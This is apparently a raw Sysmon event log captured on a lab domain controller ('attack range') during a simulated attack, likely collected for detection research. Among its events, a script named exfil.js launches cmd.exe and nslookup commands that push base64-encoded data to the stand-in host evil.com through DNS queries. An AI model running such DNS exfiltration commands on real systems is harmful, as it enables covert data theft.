14:16:42.488{2E1864BB-17CA-629A-AD41-000000005F02}8080652C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-AE41-000000005F02}7796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.473{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.473{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.473{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.473{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-AE41-000000005F02}7796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.473{2E1864BB-17CA-629A-AC41-000000005F02}42326248C:\Windows\system32\cmd.exe{2E1864BB-17CA-629A-AE41-000000005F02}7796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.484{2E1864BB-17CA-629A-AE41-000000005F02}7796C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CA-629A-AC41-000000005F02}4232C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlclfji.tmp 2>&1 10341000x8000000000000000203473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.436{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-AD41-000000005F02}8080C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.436{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CA-629A-AD41-000000005F02}8080C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.436{2E1864BB-17CA-629A-AD41-000000005F02}8080652C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-AC41-000000005F02}4232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.420{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-AD41-000000005F02}8080C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.406{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-AC41-000000005F02}4232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.406{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.406{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.406{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.406{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.406{2E1864BB-17A1-629A-783D-000000005F02}55526580C:\Windows\System32\WScript.exe{2E1864BB-17CA-629A-AC41-000000005F02}4232C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.407{2E1864BB-17CA-629A-AC41-000000005F02}4232C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlclfji.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.389{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlelo.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000203461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.734{2E1864BB-E13C-6299-0B00-000000005F02}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56354-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000203460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.734{2E1864BB-E14E-6299-2B00-000000005F02}1040C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local56354-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local389ldap 354300x8000000000000000203459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:40.000{00000000-0000-0000-0000-000000000000}1636<unknown process>-udpfalsefalse127.0.0.1-52990-false127.0.0.1-53domain 354300x8000000000000000203458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.623{00000000-0000-0000-0000-000000000000}5088<unknown process>-udptruefalse127.0.0.1-52980-false127.0.0.1-53domain 10341000x8000000000000000203457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.317{2E1864BB-17CA-629A-AA41-000000005F02}78046404C:\Windows\system32\conhost.exe{2E1864BB-17CA-629A-AB41-000000005F02}3336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.621{00000000-0000-0000-0000-000000000000}5088<unknown process>-udpfalsefalse127.0.0.1-52978-false127.0.0.1-53domain 10341000x8000000000000000203455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.493{00000000-0000-0000-0000-000000000000}6140<unknown process>-udpfalsefalse127.0.0.1-52976-false127.0.0.1-53domain 354300x8000000000000000203453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.493{00000000-0000-0000-0000-000000000000}6140<unknown process>-udptruefalse127.0.0.1-52976-false127.0.0.1-53domain 10341000x8000000000000000203452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.371{00000000-0000-0000-0000-000000000000}2932<unknown process>-udpfalsefalse127.0.0.1-52974-false127.0.0.1-53domain 10341000x8000000000000000203450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.317{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000203448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:39.370{00000000-0000-0000-0000-000000000000}2932<unknown process>-udptruefalse127.0.0.1-52973-false127.0.0.1-53domain 10341000x8000000000000000203447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.317{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CA-629A-AB41-000000005F02}3336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.317{2E1864BB-17CA-629A-A941-000000005F02}79046932C:\Windows\system32\cmd.exe{2E1864BB-17CA-629A-AB41-000000005F02}3336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:42.323{2E1864BB-17CA-629A-AB41-000000005F02}3336C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CA-629A-A941-000000005F02}7904C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlelo.tmp 2>&1 10341000x8000000000000000203444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 